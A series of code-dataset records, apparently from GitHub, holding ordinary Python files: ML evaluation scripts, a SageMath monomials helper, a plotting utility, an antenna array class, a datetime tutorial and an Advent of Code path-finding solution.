model=model, data_loader=valset)\n # predictions[0] = evaluate_utils.predict_uncertainty(\n # model=model, data_loader=testset)\n for perturbation in evaluate_utils.PERTURBATIONS[TRAINING_FLAGS['dataset']]:\n results_perturbation_folder = os.path.join(results_folder,\n f'perturbation_{perturbation}')\n tf.io.gfile.mkdir(results_perturbation_folder)\n\n perturbation_range = evaluate_utils.PERTURBATION_RANGES[perturbation]\n predictions = dict()\n if TRAINING_FLAGS['dataset'] == 'cityscapes':\n # predictions[0] = test_predictions\n predictions[0] = evaluate_utils.predict_uncertainty(\n model=model, data_loader=testset)\n for p in perturbation_range:\n\n print(f'evaluating {perturbation} = {p}', flush=True)\n\n # get OOD data\n if TRAINING_FLAGS['dataset'] == 'cityscapes':\n oodset = get_cityscapes_testset(\n testset_np[0], testset_np[1],\n batch_size=TRAINING_FLAGS['batch_size'],\n corruption=perturbation, severity=p) # perturbation\n else:\n raise ValueError(f'Unknown dataset {TRAINING_FLAGS[\"dataset\"]}!')\n\n # make predictions\n predictions[p] = evaluate_utils.predict_uncertainty(\n model=model, data_loader=oodset)\n\n del oodset\n gc.collect()\n\n metrics = evaluate_utils.compute_calibration_metrics(\n predictions=predictions, segmentation=True,\n dataset=TRAINING_FLAGS[\"dataset\"])\n evaluate_utils.postprocess_calibration_metrics(\n calibration_metrics=metrics, results_path=results_perturbation_folder)\n #########################################\n\n print('Evaluation done.')\n\n\nif __name__ == '__main__':\n app.run(main)\n","repo_name":"janisgp/practicality_deterministic_epistemic_uncertainty","sub_path":"evaluate_semantic_segmentation.py","file_name":"evaluate_semantic_segmentation.py","file_ext":"py","file_size_in_byte":5369,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"70151576760","text":"\"Monomials\"\n\ndef _monomials(gens, R, n, i):\n \"\"\"\n Given two lists ``gens`` and ``n`` of exactly the same length,\n return all monomials in the elements of ``gens`` in ``R`` where\n the ``i``-th generator in the monomial appears to degree strictly\n less than ``n[i]``.\n\n EXAMPLES::\n\n sage: monomials([x], [3]) # indirect doctest\n [1, x, x^2]\n \"\"\"\n # each power of the ith generator times all products\n # not involving the ith generator.\n if len(gens) == 1:\n b = gens[0]\n v = [R(1)]\n for _ in range(n[0]-1):\n v.append(v[-1]*b)\n return v\n else:\n z = gens[i]\n w = list(gens)\n del w[i]\n nn = list(n)\n del nn[i]\n v = monomials(w, nn)\n k = len(v)\n for _ in range(n[i]-1):\n for j in range(k):\n v.append(v[j]*z)\n z *= gens[i]\n return v\n\nfrom sage.structure.sequence import Sequence\n\ndef monomials(v, n):\n \"\"\"\n Given two lists ``v`` and ``n``, of exactly the same length,\n return all monomials in the elements of ``v``, where\n variable ``i`` (i.e., ``v[i]``) in the monomial appears to\n degree strictly less than ``n[i]``.\n\n INPUT:\n\n - ``v`` -- list of ring elements\n\n - ``n`` -- list of integers\n\n EXAMPLES::\n\n sage: monomials([x], [3])\n [1, x, x^2]\n sage: R.<x,y,z> = QQ[]\n sage: monomials([x,y], [5,5])\n [1, y, y^2, y^3, y^4, x, x*y, x*y^2, x*y^3, x*y^4, x^2, x^2*y, x^2*y^2, x^2*y^3, x^2*y^4, x^3, x^3*y, x^3*y^2, x^3*y^3, x^3*y^4, x^4, x^4*y, x^4*y^2, x^4*y^3, x^4*y^4]\n sage: monomials([x,y,z], [2,3,2])\n [1, z, y, y*z, y^2, y^2*z, x, x*z, x*y, x*y*z, x*y^2, x*y^2*z]\n \"\"\"\n\n if (len(v) != len(n)):\n raise ValueError(\"inputs must be of the same length.\")\n if len(v) == 0:\n return []\n 
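# A plain-Python view of the _monomials recursion above: the exponent vectors of
# all monomials where variable i appears to a power strictly below n[i] are just
# the cartesian product range(n[0]) x ... x range(n[-1]):
from itertools import product

def monomial_exponents(n):
    return list(product(*(range(k) for k in n)))

# monomial_exponents([3]) -> [(0,), (1,), (2,)], matching [1, x, x^2]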
v = Sequence(v)\n R = v.universe()\n return _monomials(v, R, n, 0)\n","repo_name":"sagemath/sage-archive-2023-02-01","sub_path":"src/sage/rings/monomials.py","file_name":"monomials.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","stars":2037,"dataset":"github-code","pt":"40"} +{"seq_id":"23780677012","text":"import matplotlib.pyplot as plt\nfrom matplotlib import rcParams\nfrom matplotlib import style\nfrom seaborn import set_palette, regplot, scatterplot, relplot\nfrom scdata.utils import std_out, dict_fmerge\nfrom scdata._config import config\nfrom .plot_tools import prepare_data, colors\nfrom numpy import array\nfrom math import floor, ceil\n\ndef scatter_plot(self, **kwargs):\n \"\"\"\n Plots correlation in matplotlib plot\n Parameters\n ----------\n traces: dict\n Data for the plot, with the format:\n traces = {1: {'devices': ['10751', '10751'],\n 'channels': ['TEMP', 'GB_2A'],\n 'subplot': 1},\n 2: {'devices': ['10752', '10752'],\n 'channels': ['TEMP', 'GB_2A'],\n 'subplot': 1}\n 3: {'devices': ['10751', '10751'],\n 'channels': ['TEMP', 'GB_2W'],\n 'subplot': 2}\n 4: {'devices': ['10752', '10752'],\n 'channels': ['TEMP', 'GB_2W'],\n 'subplot': 2}\n }\n options: dict\n Options including data processing prior to plot. Defaults in config._plot_def_opt\n formatting: dict\n Formatting dict. Defaults in config._scatter_plot_def_fmt\n Returns\n -------\n Matplotlib figure and axes\n \"\"\"\n\n if config.framework == 'jupyterlab': plt.ioff();\n plt.clf();\n\n if 'traces' not in kwargs:\n std_out('No traces defined', 'ERROR')\n return None\n else:\n traces = kwargs['traces']\n\n if 'options' not in kwargs:\n std_out('Using default options')\n options = config._plot_def_opt\n else:\n options = dict_fmerge(config._plot_def_opt, kwargs['options'])\n\n if 'formatting' not in kwargs:\n std_out('Using default formatting')\n formatting = config._scatter_plot_def_fmt['mpl']\n else:\n formatting = dict_fmerge(config._scatter_plot_def_fmt['mpl'], kwargs['formatting'])\n\n # Style\n if formatting['style'] is not None: style.use(formatting['style'])\n else: style.use(config._plot_style)\n\n # Palette\n if formatting['palette'] is not None: set_palette(formatting['palette'])\n\n # Font size\n if formatting['fontsize'] is not None: rcParams.update({'font.size': formatting['fontsize']});\n\n # Make it standard\n ptraces = dict()\n\n for trace in traces:\n if 'subplot' not in traces[trace]: traces[trace]['subplot'] = 1\n if 'channels' not in traces[trace]: ptraces = traces; continue\n\n ptrace_1 = trace * 10 + 1\n ptrace_2 = trace * 10 + 2\n\n ptraces[ptrace_1] = {'devices': traces[trace]['devices'][0],\n 'channel': traces[trace]['channels'][0],\n 'subplot': traces[trace]['subplot']\n }\n\n ptraces[ptrace_2] = {'devices': traces[trace]['devices'][1],\n 'channel': traces[trace]['channels'][1],\n 'subplot': traces[trace]['subplot']\n }\n\n # Workaround to get the hue here\n if 'hue' in traces[trace]:\n ptrace_3 = trace * 10 + 3\n ptraces[ptrace_3] = {'devices': traces[trace]['hue'][0],\n 'channel': traces[trace]['hue'][1],\n 'subplot': traces[trace]['subplot']\n }\n\n # Get dataframe\n df, subplots = prepare_data(self, ptraces, options)\n\n # If empty, nothing to do here\n if df is None:\n return None\n\n n_subplots = len(subplots)\n\n # Plot\n nrows = min(n_subplots, formatting['nrows'])\n ncols = ceil(n_subplots/nrows)\n\n figure, axes = plt.subplots(nrows, ncols, figsize = (formatting['width'],\n formatting['height'])\n );\n\n if n_subplots == 1:\n axes = 
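# The single-subplot special case handled here can be avoided at the call site:
# passing squeeze=False makes plt.subplots always return a 2-D array of Axes, so
# axes[row][col] indexing works for any nrows/ncols. Minimal sketch:
import matplotlib.pyplot as plt

fig, axs = plt.subplots(1, 1, squeeze=False)  # axs.shape == (1, 1)
ax = axs[0][0]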
array(axes)\n axes.shape = (1)\n\n cind = 0\n y_axes = list()\n x_axes = list()\n\n for i in subplots:\n for j in range(int(len(i)/2)):\n cind += 1\n if cind > len(colors)-1: cind = 0\n\n if nrows > 1 and ncols > 1:\n row = floor(subplots.index(i)/ncols)\n col = subplots.index(i)-row*ncols\n ax = axes[row][col]\n else:\n ax = axes[subplots.index(i)]\n\n kwargs = {\n 'data':df,\n 'ax': ax,\n 'label': f'{i[2*j+1]} vs. {i[2*j]}'\n }\n\n if len(i) == 3:\n\n if formatting['palette'] is None:\n cmap = plt.colormaps()[cind]\n else:\n cmap = formatting['palette']\n\n # Assume this is the hue\n norm = plt.Normalize(df[i[2]].min(), df[i[2]].max())\n sm = plt.cm.ScalarMappable(cmap=cmap, norm=norm)\n sm.set_array([])\n\n kwargs['hue'] = i[2]\n kwargs['palette'] = cmap\n kwargs['legend'] = False\n hashue=True\n\n else:\n if formatting['palette'] is None:\n kwargs['color'] = colors[cind]\n hashue=False\n\n scatterplot(df[i[2*j]], df[i[2*j+1]], **kwargs)\n\n if hashue:\n plt.colorbar(sm, ax = ax, orientation = 'vertical', label = i[2])\n\n if formatting['legend']:\n ax.set_title(f'{i[2*j+1]} vs. {i[2*j]}', fontsize = formatting['title_fontsize'])\n\n if formatting['ylabel'] is not None:\n try:\n ax.set_ylabel(formatting['ylabel']);\n except:\n std_out (f'y_label for subplot {subplots.index(i)} not set', 'WARNING')\n ax.set_ylabel('')\n pass\n else:\n ax.set_ylabel('')\n\n if formatting['xlabel'] is not None:\n try:\n ax.set_xlabel(formatting['xlabel']);\n except:\n std_out (f'x_label for subplot {subplots.index(i)} not set', 'WARNING')\n ax.set_xlabel('')\n pass\n else:\n ax.set_xlabel('')\n\n y_axes.append(ax.get_ylim())\n x_axes.append(ax.get_xlim())\n\n # Unify axes or set what was ordered\n for i in subplots:\n for j in range(int(len(i)/2)):\n\n if nrows > 1 and ncols > 1:\n row = floor(subplots.index(i)/ncols)\n col = subplots.index(i)-row*ncols\n ax = axes[row][col]\n else:\n ax = axes[subplots.index(i)]\n\n # Set y axis limit\n if formatting['yrange'] is not None and not formatting['sharey']:\n try:\n ax.set_ylim(formatting['yrange']);\n except:\n std_out (f'yrange for subplot {subplots.index(i)} not set', 'WARNING')\n pass\n elif formatting['sharey']:\n ax.set_ylim(min([yl[0] for yl in y_axes]), max([yl[1] for yl in y_axes]))\n\n # Set x axis limit\n if formatting['xrange'] is not None and not formatting['sharex']:\n try:\n ax.set_xlim(formatting['xrange']);\n except:\n std_out (f'xrange for subplot {subplots.index(i)} not set', 'WARNING')\n pass\n elif formatting['sharex']:\n ax.set_xlim(min([xl[0] for xl in x_axes]), max([xl[1] for xl in x_axes]))\n\n if formatting['legend']:\n ax.legend(loc='best')\n else:\n ax.get_legend().remove()\n\n # Set title\n figure.suptitle(formatting['title'], fontsize = formatting['title_fontsize']);\n plt.subplots_adjust(top = formatting['suptitle_factor']);\n\n if options['show']: plt.show();\n\n return figure, axes\n","repo_name":"fablabbcn/smartcitizen-data","sub_path":"scdata/test/plot/scatter_plot.py","file_name":"scatter_plot.py","file_ext":"py","file_size_in_byte":8107,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"40"} +{"seq_id":"34978894059","text":"import tensorflow as tf \r\nfrom tensorflow.keras.layers import Dense, Flatten, Input \r\nfrom tensorflow.keras.models import Model \r\n\r\n\r\ndef base_model() : \r\n\r\n inputs = Input(shape = (), name = 'clothing') \r\n x = Dense(64, activation= 'relu', name = 'dense_1')(inputs) \r\n x = Dense(64, activation= 'relu', name = 'dense_2')(x) \r\n output = 
Dense(10, activation= 'softmax', name = 'output')(x) \r\n\r\n    model = Model(inputs = inputs, outputs = output) \r\n    return model \r\n\r\n\r\n","repo_name":"sasidhar-programmer/Tensorflow_Advance_Techniques","sub_path":"2-custom_and_distributed_training/pratice_py/5_custom_1.py","file_name":"5_custom_1.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"40"}
+{"seq_id":"14426330977","text":"import numpy as np\nfrom scipy.spatial import distance\nimport matplotlib.pyplot as plt\n\nfrom pycrb import UV\n\n\nclass ArrayManifold(object):\n    \"\"\"Array manifold class\"\"\"\n\n    def __init__(self, N_, w_, x_, y_, n_theta_, n_phi_):\n\n        self.N = N_\n        self.w = w_\n        self.x = x_\n        self.y = y_\n        self.n_theta = n_theta_\n        self.n_phi = n_phi_\n\n    @staticmethod\n    def interelement_distance(x_, y_):\n\n        return distance.cdist(x_, y_, 'euclidean')\n\n    def array_manifold_vector(self, wavelength, uv: UV):\n\n        U, V = np.meshgrid(uv.u, uv.v)\n\n        VV = np.asarray([np.exp(1j * 2 * np.pi / wavelength * (xx * U + yy * V))\n                         for (xx, yy) in zip(self.x, self.y)])\n\n        return VV\n\n    def conventional_beamformer(self, wavelength, uv: UV, uv_s: UV):\n\n        V = self.array_manifold_vector(wavelength, uv)\n\n        V_s = self.array_manifold_vector(wavelength, uv_s)\n\n        B_temp = np.reshape(\n            np.multiply(\n                V_s.flatten().conj().T,\n                V.flatten()),\n            (self.N,\n             128,\n             128))\n\n        B = np.sum(B_temp, axis=0)\n\n        return B\n\n    def sampling_points(self):\n\n        return self.x[None, :] - \\\n            self.x[:, None], self.y[None, :] - self.y[:, None]\n\n    def _plot(self, wavelength):\n\n        plt.plot(self.x / wavelength, self.y / wavelength, 'o')\n        plt.axis('equal')\n        plt.xlabel('x (wavelengths)')\n        plt.ylabel('y (wavelengths)')\n        plt.grid()\n","repo_name":"mgoar/pycrb","sub_path":"pycrb/ArrayManifold.py","file_name":"ArrayManifold.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"}
+{"seq_id":"73389363320","text":"#\n# timedelta objects\n#\n\nfrom datetime import date\nfrom datetime import time\nfrom datetime import datetime\nfrom datetime import timedelta\n\ndef main():\n    # construct a basic timedelta and print it (a timedelta is a span of time)\n    print(timedelta(days=365, hours=5, minutes=1)) # 365 days, 5:01:00\n    \n    # print today's date\n    now = datetime.now()\n    print(\"Today is\", now) # Today is 2023-06-27 09:45:02.942544\n    \n    # print today's date one year from now\n    print(\"One year from now it will be\", str(now + timedelta(days=365))) # One year from now it will be 2024-06-26 09:45:02.942544\n    \n    # create a timedelta that uses more than one argument\n    print(\"In two weeks and 3 days it will be\", str(now + timedelta(weeks=2, days=3))) # In two weeks and 3 days it will be 2023-07-14 09:49:11.556998\n    \n    # calculate the date 1 week ago, formatted as a string\n    t = datetime.now() - timedelta(weeks=1)\n    s = t.strftime(\"%A %B %d, %Y\")\n    print(\"One week ago it was\", s) # One week ago it was Tuesday June 20, 2023\n    \n    ## How many days until April Fools' Day?\n    today = date.today()\n    afd = date(today.year, 4, 1)\n    \n    # if it has already passed, use the replace() function to get the date for next year\n    if afd < today:\n        print(\"April Fools' Day already went by:\", ((today - afd).days)) # April Fools' Day already went by: 87\n        afd = afd.replace(year = today.year + 1)\n    \n    time_to_afd = afd - today\n    print(\"It is\", time_to_afd.days, \"days until the next April Fool's 
Day!\n \nif __name__ == \"__main__\":\n main()","repo_name":"tjcchen/python-review","sub_path":"Ch4-Dates/timedeltas.py","file_name":"timedeltas.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40936595706","text":"import copy\nimport math\nimport sys\nsys.path.insert(0, '.')\nfrom tools import log\n\nclass Vertex():\n def __init__(self, distance,x,y):\n self.cost = math.inf\n self.distance = distance\n self.prev = None\n self.x = x\n self.y = y\n\n def __repr__(self) -> str:\n return str([self.cost,self.distance,self.prev,self.x,self.y])\n\ndef parse_data(data):\n l = len(data.split('\\n'))\n field = []\n for y,data_line in enumerate(data.split('\\n')*5): \n line = []\n for x,data_char in enumerate([list(data_line)]*5):\n for n, m in enumerate(data_char):\n a = (int(m) + x + int(y/(l)))\n line.append(Vertex(a if (a < 10) else (a-9),x*(len(data_line))+n,y))\n field.append(line)\n\n field[0][0].cost = 0\n\n return field\n\n\ndef get_costs(field,point):\n new_field = []\n finish = field[len(field)-1][len(field)-1]\n\n while True:\n \n for n in get_neighbors(field, point.x, point.y):\n if n != None:\n neighbor = field[n[1]][n[0]]\n a = point.cost + neighbor.distance\n \n if neighbor.cost > a:\n neighbor.cost = a\n neighbor.prev = point\n new_field.append(neighbor)\n\n point = min(new_field, key=lambda x: x.cost)\n new_field.remove(point)\n if point is finish:\n break\n \n return field\n \ndef get_smallest_not_visited_point(new_field):\n return min(new_field, key= lambda x: x.cost)\n\ndef get_neighbors(field,x,y):\n for elm in ((-1,0),(1,0),(0,-1),(0,1)):\n xn = x+elm[0]\n yn = y+elm[1]\n yield (xn,yn) if xn >= 0 and xn < len(field[0]) and yn < len(field) and yn >= 0 else None\n\ndef get_path(point):\n path = []\n while point.prev is not None:\n path.append(point)\n point = point.prev\n\n return path\n\ndef get_sum(path):\n sum = 0\n \n for point in path:\n sum += point.distance\n \n return sum\n@log\ndef main(data):\n data = parse_data(data)\n data = (get_costs(data,data[0][0]))\n\n print(\"Done!\")\n \n return get_sum(get_path(data[len(data)-1][len(data[0])-1]))\n\n\ndata1 = open(\"./Day 15/data1\", \"r\").read()\ndata2 = open(\"./Day 15/data2\", \"r\").read()\n\nmain(data1)\nmain(data2)","repo_name":"mightytry/AdventOfCode","sub_path":"Adventofcode 2021/Day 15/Chiton2.py","file_name":"Chiton2.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"35567116451","text":"import os\nimport cv2\nimport sys\nimport time\nfrom skimage.measure import compare_ssim as ssim\nfrom tqdm import tqdm\nimport imageio\nimport math\n\nimport tkinter as tk\nfrom PIL import Image, ImageDraw, ImageTk\n\nimport tensorflow as tf\nimport scipy.misc as sm\nimport scipy.io as sio\nimport numpy as np\nimport skimage.measure as measure\n\nimport sys\n\n#change this to where the training folder is located\npath_to_evalmodel = '../../large data format/eval_large_data_format'\nsys.path.insert(0, path_to_evalmodel)\n\nfrom move_network_val_large_data_format import MCNET\nfrom utils import *\nfrom os import listdir, makedirs, system\nfrom os.path import exists\nfrom argparse import ArgumentParser\nfrom skimage.draw import line_aa\npath_to_pp = '../'\nsys.path.insert(0, path_to_pp)\nimport preprocessing_situ_all_data as pp\n\nthresh = 96\n\n#global variable init\nreturn_clips = []\nreturn_transformation = 
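# get_costs in the Chiton record above pops the cheapest frontier vertex with
# min() over a list, which is O(n) per pop; a binary heap makes that O(log n).
# A self-contained sketch on a grid of int risk levels, same rules as the puzzle
# (the start cell's risk is not counted):
import heapq

def dijkstra_grid(grid):
    h, w = len(grid), len(grid[0])
    dist = {(0, 0): 0}
    heap = [(0, 0, 0)]  # (cost, x, y)
    while heap:
        cost, x, y = heapq.heappop(heap)
        if (x, y) == (w - 1, h - 1):
            return cost
        if cost > dist.get((x, y), cost):
            continue  # stale heap entry; this vertex was already settled cheaper
        for dx, dy in ((-1, 0), (1, 0), (0, -1), (0, 1)):
            nx, ny = x + dx, y + dy
            if 0 <= nx <= w - 1 and 0 <= ny <= h - 1:
                ncost = cost + grid[ny][nx]
                if dist.get((nx, ny), float("inf")) > ncost:
                    dist[(nx, ny)] = ncost
                    heapq.heappush(heap, (ncost, nx, ny))

assert dijkstra_grid([[1, 2], [1, 1]]) == 2  # down then right: 1 + 1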
[]\noccupancy_buffer = []\ntransformation_buffer = []\nocclusion_buffer = []\nrgb_buffer = []\ndepth_buffer = []\nsegmentation_buffer = []\ndata_size = []\ndirection_buffer = []\nsess = -1\nmodel = -1\nimage_size = -1\ndata_w = -1\ndata_h = -1\ncanvas = -1\n\ndef init(checkpoint_dir_loc, prefix, image_size_i=96, data_w_i=240, data_h_i=80, K_i=9, T_i=10, seq_steps=1, useDenseBlock=False, samples=1):\n global K, T, sess, model, image_size, data_h, data_w, canvas\n root = tk.Tk()\n canvas = tk.Canvas(root, width=(data_w_i*3+data_h_i), height=(data_h_i*T_i), bd=0, highlightthickness=0)\n canvas.pack()\n data_w = data_w_i\n data_h = data_h_i\n image_size = image_size_i\n gpu = np.arange(1)\n K = K_i\n T = T_i\n print(\"Setup variables...\")\n datasze_tf = np.zeros(2)\n datasze_tf[0] = data_w\n datasze_tf[1] = data_h\n imgsze_tf = image_size\n seqlen_tf = seq_steps\n K_tf = K_i\n T_tf = T_i\n fc_tf = K #we have K frames, we predict next T\n assert(seq_steps <= seqlen_tf)\n assert(K <= K_tf)\n assert(T <= T_tf)\n assert(seqlen_tf == 1)\n\n #first dim = batch_size, set to 1, needed for compatibility with model\n input_batch_shape = [1, imgsze_tf, imgsze_tf, seqlen_tf*(K_tf), 2]\n maps_batch_shape = [1, imgsze_tf, imgsze_tf, seqlen_tf*(K_tf)+1, 2]\n transformation_batch_shape = [1, seqlen_tf*(K_tf),3,8]\n rgb_batch_shape = [1, fc_tf,datasze_tf[1],datasze_tf[0],3]\n segmentation_batch_shape = [1, fc_tf,datasze_tf[1],datasze_tf[0],3]\n depth_batch_shape = [1, fc_tf,datasze_tf[1],datasze_tf[0],1]\n direction_batch_shape = [1, fc_tf,2]\n\n graph = tf.Graph()\n with graph.as_default():\n checkpoint_dir = checkpoint_dir_loc + prefix + \"/\"\n best_model = None # will pick last model\n\n # initialize model\n model = MCNET(image_size=[image_size, image_size], data_size=[data_h, data_w], batch_size=1, K=K,\n T=T, c_dim=1, checkpoint_dir=checkpoint_dir,\n iterations=seq_steps, useSELU=True, motion_map_dims=2,\n showFutureMaps=False, useDenseBlock=useDenseBlock, samples=samples)\n\n # Setup model (for details see training_large_data_format folder)\n model.pred_occlusion_map = tf.ones(model.occlusion_shape, dtype=tf.float32, name='Pred_Occlusion_Map') * model.predOcclValue\n with tf.variable_scope(tf.get_variable_scope()) as vscope:\n with tf.device(\"/gpu:%d\" % gpu[0]):\n\n #fetch input\n model.input_batch = tf.placeholder(tf.float32, shape=input_batch_shape,name='input_batch')\n model.map_batch = tf.placeholder(tf.float32, shape=maps_batch_shape,name='map_batch')\n model.transformation_batch = tf.placeholder(tf.float32, shape=transformation_batch_shape,name='transformation_batch')\n model.rgb_cam = tf.placeholder(tf.float32, shape=rgb_batch_shape,name='rgb_cam')\n model.seg_cam = tf.placeholder(tf.float32, shape=segmentation_batch_shape,name='seg_cam')\n model.dep_cam = tf.placeholder(tf.float32, shape=depth_batch_shape,name='dep_cam')\n model.direction = tf.placeholder(tf.uint8, shape=direction_batch_shape,name='direction')\n\n # Construct the model\n pred, _, _, rgb_pred, seg_pred, dep_pred, trans_pred, dir_pred, sy_pred = model.forward(model.input_batch, model.map_batch, model.transformation_batch, model.rgb_cam, model.seg_cam, model.dep_cam, model.direction)\n\n model.G = tf.stack(axis=3, values=pred)\n model.trans_pred = trans_pred\n model.rgb_pred = tf.stack(rgb_pred,1)\n model.seg_pred = tf.stack(seg_pred,1)\n model.dep_pred = tf.stack(dep_pred,1)\n model.speedyaw_pred = sy_pred\n model.dir_pred = dir_pred\n\n tf.get_variable_scope().reuse_variables()\n\n\n gpu_options = 
tf.GPUOptions(per_process_gpu_memory_fraction=0.8, allow_growth=True)\n\n with graph.as_default():\n\n model.saver = tf.train.Saver()\n\n init = tf.global_variables_initializer()\n\n sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True,log_device_placement=False,gpu_options=gpu_options))\n\n sess.run(init)\n\n bool, ckpt = model.load(sess, checkpoint_dir, best_model)\n print(checkpoint_dir)\n if bool:\n print(\" [*] Load SUCCESS\")\n else:\n print(\" [!] Load failed... exitting\")\n print(\" [!] Checkpoint file is: \"+str(ckpt))\n if ckpt != None:\n print(ckpt.model_checkpoint_path)\n return\n\n# standard eval call, displays predicted grid map and images\ndef eval(input_gridmap, rgb, dep, seg, yaw_rate, speed):\n # preprocess input\n ppTime = time.time()\n ready, gridmap, gm_map, trans_matrix, rgb, seg, dep, dir_vehicle = preprocessing(input_gridmap, rgb, dep, seg, yaw_rate, speed)\n ppTime = time.time() - ppTime\n if ready:\n evTime = time.time()\n samples, rgb_pred, seg_pred, dep_pred, tfmat, speedyawrate, dir_pred = sess.run([model.G, model.rgb_pred, model.seg_pred, model.dep_pred, model.trans_pred, model.speedyaw_pred, model.dir_pred],\n feed_dict={model.input_batch: gridmap,\n model.map_batch: gm_map,\n model.transformation_batch: trans_matrix,\n model.rgb_cam: rgb,\n model.seg_cam: seg,\n model.dep_cam: dep,\n model.direction: dir_vehicle})\n\n evTime = time.time() - evTime\n imTime = time.time()\n\n samples_seq_step = (samples[0, :, :,:].swapaxes(0, 2).swapaxes(1, 2) + 1) / 2.0\n samples_seq_step = np.tile(samples_seq_step, [1,1,1,3])\n\n curr_frame = []\n\n rgb_pred = (np.clip(rgb_pred,-1,1)+1)/2 * 255\n seg_pred = (seg_pred+1)/2 * 255\n dep_pred = (dep_pred+1)/2 * 255\n\n for seq_step in range(T):\n pred = np.squeeze(samples_seq_step[K+seq_step])\n pred = (pred * 255).astype(\"uint8\")\n curr_frame.append(np.concatenate([\n np.asarray(Image.fromarray(pred).resize((data_h,data_h),Image.ANTIALIAS)),\n rgb_pred[0,K+seq_step,:,:,:],\n seg_pred[0,K+seq_step,:,:,:],\n np.tile(dep_pred[0,K+seq_step,:,:,:],[1,1,3])],1))\n\n npImg = np.uint8(np.concatenate(curr_frame,0))\n\n im = Image.fromarray(npImg)\n imTime = time.time() - imTime\n tkTime = time.time()\n image1 = ImageTk.PhotoImage(im)\n canvas.create_image(0, 0, image=image1, anchor=\"nw\")\n canvas.update()\n tkTime = time.time() - tkTime\n return ppTime, evTime, imTime, tkTime, speedyawrate, dir_pred, True, npImg\n\n return ppTime, 0, 0, 0, np.nan, np.nan, False, -1\n\n# eval call that only returns predicted odometry without displaying predictions\ndef eval_only_drive(input_gridmap, rgb, dep, seg, yaw_rate, speed):\n # preprocess input\n ppTime = time.time()\n ready, gridmap, gm_map, trans_matrix, rgb, seg, dep, dir_vehicle = preprocessing(input_gridmap, rgb, dep, seg, yaw_rate, speed)\n ppTime = time.time() - ppTime\n if ready:\n evTime = time.time()\n tfmat, speedyawrate, dir_pred = sess.run([model.trans_pred, model.speedyaw_pred, model.dir_pred],\n feed_dict={model.input_batch: gridmap,\n model.map_batch: gm_map,\n model.transformation_batch: trans_matrix,\n model.rgb_cam: rgb,\n model.seg_cam: seg,\n model.dep_cam: dep,\n model.direction: dir_vehicle})\n\n evTime = time.time() - evTime\n return ppTime, evTime, 0, 0, speedyawrate, dir_pred\n\n return ppTime, 0, 0, 0, np.nan, np.nan\n\n#following functions are from the preprocessing script\ndef create_default_element(image_size, seq_length, channel_size):\n element = np.zeros([image_size, image_size, seq_length * channel_size], dtype=np.float32)\n return 
element\n\ndef read_frame(occup_map, occlusion_map):\n #dummy values as long as no underlying road can be extracted from carla - backward comp. with NN model\n lines_map = np.ones(shape=(occup_map.shape)) * 255\n road_map = np.ones(shape=(occup_map.shape)) * 255\n if len(occlusion_map.shape) == 3:\n occlusion_map = np.mean(occlusion_map, axis=2)\n return np.stack([occup_map*255, occlusion_map*255, lines_map, road_map, occlusion_map*255], axis=2)\n\ndef read_matrix(matrix):\n tf_matrix = np.zeros([3,8], dtype=np.float32)\n tf_matrix[:,0:3] = matrix[:,0,:]\n tf_matrix[:,3:6] = matrix[:,1,:]\n return tf_matrix\n\ndef normalize_frames(frames):\n new_frames = frames.astype(np.float32)\n new_frames //= (255 // 2)\n new_frames -= 1\n return new_frames\n\ndef get_occupancy_diff(clip):\n occup_clip = np.multiply((clip[:,:,::5] + 1)/2.0, (clip[:,:,4::5] + 1)/2.0)\n occup_diff = occup_clip[:,:,:-1] - occup_clip[:,:,1:]\n occup_diff = np.absolute(occup_diff)\n return np.sum(occup_diff) * 1.0 / occup_diff.shape[2]\n\ndef trigClip(x,fn):\n return fn(np.clip(x,-1,1))\n\ndef inverseTransformationMatrix(nextTf):\n mat = np.zeros([3,2,3], dtype=np.float32)\n mat[:,0,:] = nextTf[:,0:3]\n mat[:,1,:] = nextTf[:,3:6]\n matFull = np.clip(mat[0,:],-1,1)\n #mean theta extracted from matrix\n theta = -(math.asin(-matFull[0,1])+math.asin(matFull[1,0]))/2\n imsize = 96 // 2\n pixel_diff_y = matFull[1,2] * ((imsize - 1) / 2.0)\n pixel_diff_x = matFull[0,2] * ((imsize - 1) / 2.0)\n py = pixel_diff_y / math.cos(theta)\n px = pixel_diff_x / math.sin(theta)\n\n if np.isinf(px) or np.isnan(px):\n pixel_diff = py\n elif np.isinf(py) or np.isnan(py):\n pixel_diff = px\n else:\n pixel_diff = (px+py)/2\n pixel_size = 45.6 * 1.0 / imsize\n period_duration = 1.0 / 24\n vel = pixel_diff * pixel_size / period_duration\n yaw_rate = math.degrees(theta) / period_duration\n return vel, yaw_rate\n\ndef compressMoveMapDataset(occupancy_buffer, occlusion_buffer, transformation_buffer, seq_length,\n transformation_only=False, split_number = 0, split_amount = 1):\n global return_clips\n global return_transformation\n max_occup_diff = 0\n min_occup_diff = 100000\n mean_occup_diff = 0.0\n all_clips = [create_default_element(image_size, seq_length, 5) for i in range(seq_length)]\n all_transformation = [np.zeros([seq_length, 3, 8], dtype=np.float32) for i in range(seq_length)]\n\n #step_offset = int(round(1.0 * step_size / split_amount * split_number))\n\n for file_index in range(len(occupancy_buffer)):\n frame = read_frame(occupancy_buffer[file_index], occlusion_buffer[file_index])\n if transformation_only:\n frame = np.zeros([1,1,1])\n transform_matrix = read_matrix(transformation_buffer[file_index])\n\n channel_size = frame.shape[2]\n\n norm_frame = normalize_frames(frame)\n for clip_index in range(len(all_clips)):\n if not transformation_only:\n all_clips[clip_index][:, :, clip_index * channel_size: (clip_index + 1) * channel_size] = norm_frame\n all_transformation[clip_index][clip_index,:,:] = transform_matrix\n if file_index >= seq_length - 1:\n if not transformation_only:\n occup_diff = get_occupancy_diff(all_clips[-1])\n max_occup_diff = max(max_occup_diff, occup_diff)\n min_occup_diff = min(min_occup_diff, 